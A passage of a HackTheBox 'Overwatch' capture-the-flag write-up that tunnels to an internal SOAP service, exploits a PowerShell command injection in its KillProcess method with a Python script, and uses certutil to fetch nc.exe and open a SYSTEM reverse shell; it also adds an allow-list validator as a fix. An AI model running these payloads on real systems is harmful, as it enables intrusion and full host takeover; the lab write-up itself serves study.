arc4 = algorithms.ARC4(self._key)
WINRM 10.129.6.144 5985 S200401 [+] overwatch.htb\sqlmgmt:bIhBbzMMnB82yx (Pwn3d!)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.6.144 -u "sqlmgmt" -p "bIhBbzMMnB82yx"

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sqlmgmt\Documents> dir
*Evil-WinRM* PS C:\Users\sqlmgmt\Documents> cd ..
*Evil-WinRM* PS C:\Users\sqlmgmt> cd Desktop
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> dir


Directory: C:\Users\sqlmgmt\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/2/2026 9:47 PM 34 user.txt


*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> type user.txt

The configuration file seen earlier mentioned that the overwatch service listens on port 8000 internally and exposes a MonitorService path, so use frp to build a tunnel that forwards that port to local port 8000 on Kali.

┌──(root㉿kaada)-[/opt/frp_0.67.0_linux_amd64]
└─# cat frps.toml
bindPort = 7000

┌──(root㉿kaada)-[/opt/frp_0.67.0_linux_amd64]
└─# ./frps -c frps.toml
2026-03-03 02:25:58.025 [I] [frps/root.go:115] frps uses config file: frps.toml
2026-03-03 02:25:58.056 [I] [server/service.go:248] frps tcp listen on 0.0.0.0:7000
2026-03-03 02:25:58.056 [I] [frps/root.go:124] frps started successfully

Then use iwr to download the prepared client binary and config, and start the connection.

*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> powershell -c "iwr -Uri http://10.10.15.114/frpc.exe -OutFile frpc.exe"
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> powershell -c "iwr -Uri http://10.10.15.114/frpc.toml -OutFile frpc.toml"

*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> .\frpc.exe -c frpc.toml
2026-03-02 23:29:20.081 [I] [sub/root.go:159] start frpc service for config file [frpc.toml]
2026-03-02 23:29:20.082 [I] [client/service.go:335] try to connect to server...
2026-03-02 23:29:20.498 [I] [client/service.go:327] [27561a409d4f6fc9] login to server success, get run id [27561a409d4f6fc9]
2026-03-02 23:29:20.498 [I] [proxy/proxy_manager.go:180] [27561a409d4f6fc9] proxy added: [intranet_8000]
2026-03-02 23:29:20.614 [I] [client/control.go:172] [27561a409d4f6fc9] [intranet_8000] start proxy success
┌──(root㉿kaada)-[/opt/frp_0.67.0_linux_amd64]
└─# ./frps -c frps.toml
2026-03-03 02:25:58.025 [I] [frps/root.go:115] frps uses config file: frps.toml
2026-03-03 02:25:58.056 [I] [server/service.go:248] frps tcp listen on 0.0.0.0:7000
2026-03-03 02:25:58.056 [I] [frps/root.go:124] frps started successfully
2026-03-03 02:29:19.458 [I] [server/service.go:597] [27561a409d4f6fc9] client login info: ip [10.129.6.144:59306] version [0.67.0] hostname [S200401] os [windows] arch [amd64]
2026-03-03 02:29:19.624 [I] [proxy/tcp.go:82] [27561a409d4f6fc9] [intranet_8000] tcp proxy listen port [8000]
2026-03-03 02:29:19.624 [I] [server/control.go:407] [27561a409d4f6fc9] new proxy [intranet_8000] type [tcp] success

The tunnel is up.

Next, visit http://127.0.0.1:8000/MonitorService

┌──(root㉿kaada)-[/opt/frp_0.67.0_windows_amd64]
└─# curl http://127.0.0.1:8000/MonitorService
<HTML lang="en"><HEAD><link rel="alternate" type="text/xml" href="http://overwatch.htb:8000/MonitorService?disco"/><STYLE type="text/css">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>MonitoringService Service</TITLE></HEAD><BODY><DIV id="content" role="main"><h1 class="heading1">MonitoringService Service</h1><BR/><P class="intro">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF="http://overwatch.htb:8000/MonitorService?wsdl">http://overwatch.htb:8000/MonitorService?wsdl</A></PRE><P>You can also access the service description as a single file:<BR/><PRE><A HREF="http://overwatch.htb:8000/MonitorService?singleWsdl">http://overwatch.htb:8000/MonitorService?singleWsdl</A></PRE></P></P><P class="intro">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. 
For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color="blue">class </font><font color="black">Test
</font>{
<font color="blue"> static void </font>Main()
{
<font color="black">MonitoringServiceClient</font> client = <font color="blue">new </font><font color="black">MonitoringServiceClient</font>();

<font color="darkgreen"> // Use the 'client' variable to call operations on the service.

</font><font color="darkgreen"> // Always close the client.
</font> client.Close();
}
}
</PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color="blue">Class </font><font color="black">Test
</font><font color="blue"> Shared Sub </font>Main()
<font color="blue"> Dim </font>client As <font color="black">MonitoringServiceClient</font> = <font color="blue">New </font><font color="black">MonitoringServiceClient</font>()
<font color="darkgreen"> ' Use the 'client' variable to call operations on the service.

</font><font color="darkgreen"> ' Always close the client.
</font> client.Close()
<font color="blue"> End Sub
</font><font color="blue">End Class</font></PRE></DIV></BODY></HTML>

I handed the code to an AI for reverse analysis and found that KillProcess has a command-injection vulnerability.

In this pile of XML, the key piece is the <xs:element name="KillProcess"> section. It tells us clearly:

  1. Method name: KillProcess
  2. Parameter: a single string named processName (type="xs:string").
  3. Namespace: http://tempuri.org/
  4. SOAP Action: http://tempuri.org/IMonitoringService/KillProcess

Unsafe command concatenation: the decompiled code shows that KillProcess takes a string processName and embeds it directly into a PowerShell script string: $"Stop-Process -Name {processName} -Force"

Breaking out of the execution context: in the original writeup the attack payload is a; certutil.exe ...; echo

  • The ; character: acts as a statement terminator in PowerShell. The first ; ends the original Stop-Process command.
  • Executing the payload: the middle part inserts the attacker's certutil download command and the nc.exe reverse-shell command.
  • The echo placeholder: the critical piece. The back end appends -Force to whatever you supply and then pipes the script's output into Out-String, so ending the payload with ; echo turns the leftover into echo -Force, a harmless statement that simply prints the literal -Force (visible in the response below) instead of causing a syntax error. That keeps the whole injected script parseable and executable.

Privilege advantage: because overwatch.exe runs as a Windows service, its default identity is typically NT AUTHORITY\SYSTEM, so nc.exe launched through this injection point inherits the highest system privilege.

// Namespaces the decompiled method depends on.
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;

// Vulnerable as shipped: processName is interpolated straight into PowerShell script text.
public string KillProcess(string processName)
{
    // Injection point: no validation, no quoting, no parameter binding.
    string scriptContents = $"Stop-Process -Name {processName} -Force";
    try
    {
        using (Runspace runspace = RunspaceFactory.CreateRunspace())
        {
            runspace.Open();
            using (Pipeline pipeline = runspace.CreatePipeline())
            {
                pipeline.Commands.AddScript(scriptContents); // attacker-controlled script is parsed and run
                pipeline.Commands.Add("Out-String");          // script output is piped into Out-String
                Collection<PSObject> collection = pipeline.Invoke();
                runspace.Close();
                StringBuilder stringBuilder = new StringBuilder();
                foreach (PSObject psObject in collection)
                    stringBuilder.AppendLine(psObject.ToString());
                return stringBuilder.ToString();            // command output is returned to the SOAP caller
            }
        }
    }
    catch (Exception ex)
    {
        return "Error: " + ex.Message;
    }
}
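For contrast with the method above, this is what a hardened boundary looks like, as an added Python example that is not part of the original writeup or of the Overwatch service: it parses the same SOAP envelope the service accepts, applies an allow-list to processName, and rejects the injection pattern instead of handing it to a script engine. The namespaces are the ones from the WSDL quoted above; the sample envelopes are constructed.

```python
"""Added example: parse the KillProcess SOAP request and allow-list processName."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SVC_NS = "http://tempuri.org/"  # service namespace from the WSDL above

# Stop-Process -Name takes a process *name* (image name without extension).
# Letters, digits, dot, underscore and hyphen cover every legitimate case;
# whitespace, ';', '|', quotes, '$', '(' and friends are rejected outright.
PROCESS_NAME_RE = re.compile(r"[A-Za-z0-9_.\-]{1,255}")


def extract_process_name(soap_xml: str):
    """Pull processName out of a KillProcess envelope; None if the shape is wrong."""
    root = ET.fromstring(soap_xml)
    path = f"{{{SOAP_NS}}}Body/{{{SVC_NS}}}KillProcess/{{{SVC_NS}}}processName"
    node = root.find(path)
    return None if node is None else (node.text or "")


def is_safe_process_name(name: str) -> bool:
    """Allow-list check: the whole value must be a bare process name."""
    return PROCESS_NAME_RE.fullmatch(name) is not None


def validate_kill_request(soap_xml: str) -> tuple[bool, str]:
    """Decision a hardened KillProcess (or a WAF in front of it) would make."""
    name = extract_process_name(soap_xml)
    if name is None:
        return False, "malformed request: processName missing"
    if not is_safe_process_name(name):
        return False, f"rejected processName {name!r}: not a bare process name"
    return True, name


def envelope(process_name: str) -> str:
    """Build the same envelope exp.py sends (constructed helper for the demo)."""
    return (
        f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Body>'
        f'<KillProcess xmlns="{SVC_NS}"><processName>{process_name}</processName>'
        f"</KillProcess></s:Body></s:Envelope>"
    )


# The ping payload from exp.py, used here only as a negative test case.
INJECTION_FROM_WRITEUP = "UraOmote; ping 10.10.15.114 -n 3; echo "


if __name__ == "__main__":
    for candidate in ("notepad", INJECTION_FROM_WRITEUP, "a; echo "):
        print(validate_kill_request(envelope(candidate)))
```

Inside the service itself the equivalent fix is to stop building script text at all and bind the name as a parameter, for example PowerShell.Create().AddCommand("Stop-Process").AddParameter("Name", processName), so the value is never parsed by the PowerShell grammar; the allow-list stays as defence in depth. Since the service runs as SYSTEM and port 8000 accepted the request without any authentication, exposing process control on that endpoint at all is the larger design problem.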

Writing the exploit

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat exp.py
import requests

# Target service address, mapped to localhost through FRP
url = "http://127.0.0.1:8000/MonitorService"

# HTTP request headers; the important part is the SOAPAction
headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": '"http://tempuri.org/IMonitoringService/KillProcess"'
}

# Our malicious payload (the injection point is processName)
# First make the target ping our Kali box (10.10.15.114) to confirm RCE
malicious_payload = 'UraOmote; ping 10.10.15.114 -n 3; echo '

# Hand-built SOAP XML message
soap_body = f"""<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <KillProcess xmlns="http://tempuri.org/">
      <processName>{malicious_payload}</processName>
    </KillProcess>
  </s:Body>
</s:Envelope>"""

print("[*] Sending malicious SOAP request...")
try:
    response = requests.post(url, data=soap_body, headers=headers, timeout=10)
    print(f"[+] HTTP Status: {response.status_code}")
    print("[+] Response from server:")
    print(response.text)
except Exception as e:
    print(f"[-] Error: {e}")

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python3 exp.py
[*] Sending malicious SOAP request...
[+] HTTP Status: 200
[+] Response from server:
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><KillProcessResponse xmlns="http://tempuri.org/"><KillProcessResult>&#xD;
Pinging 10.10.15.114 with 32 bytes of data:&#xD;
Reply from 10.10.15.114: bytes=32 time=161ms TTL=63&#xD;
Reply from 10.10.15.114: bytes=32 time=77ms TTL=63&#xD;
Reply from 10.10.15.114: bytes=32 time=75ms TTL=63&#xD;
&#xD;
Ping statistics for 10.10.15.114:&#xD;
Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),&#xD;
Approximate round trip times in milli-seconds:&#xD;
Minimum = 75ms, Maximum = 161ms, Average = 104ms&#xD;
-Force&#xD;
&#xD;
</KillProcessResult></KillProcessResponse></s:Body></s:Envelope>

Command execution confirmed.

Have the target download nc.exe and spawn a reverse shell

malicious_payload = (
    'a; certutil.exe -urlcache -split -f http://10.10.15.114/nc.exe C:\\Windows\\Temp\\nc.exe; '
    'C:\\Windows\\Temp\\nc.exe 10.10.15.114 4444 -e cmd.exe; echo '
)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 127.0.0.1 192.168.21.128 192.168.56.104 192.168.10.150 172.17.0.1 172.18.0.1 10.10.15.114
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from S200401-10.129.6.144-Microsoft_Windows_Server_2022_Standard-x64-based_PC 😍 Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/S200401~10.129.6.144_Microsoft_Windows_Server_2022_Standard_x64-based_PC/2026_03_03-02_49_26-692.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
C:\Software\Monitoring>whoami
whoami
nt authority\system

C:\Software\Monitoring>


HackTheBox-Overwatch
http://example.com/2026/03/03/HackTheBox-Overwatch/
Author: Skyarrow
Posted on: March 3, 2026